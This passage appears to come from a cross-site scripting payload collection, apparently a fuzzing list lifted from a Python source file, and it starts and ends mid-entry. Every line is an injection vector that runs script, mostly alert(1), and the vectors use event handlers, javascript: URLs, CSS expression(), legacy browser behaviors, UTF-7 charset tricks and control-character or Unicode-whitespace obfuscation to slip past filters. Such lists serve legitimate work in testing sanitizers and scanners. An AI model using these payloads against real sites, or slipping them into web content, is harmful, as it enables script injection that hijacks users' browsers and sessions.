alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html 
onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee 
onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body 
onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> 
+<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> 
+"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input 
onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
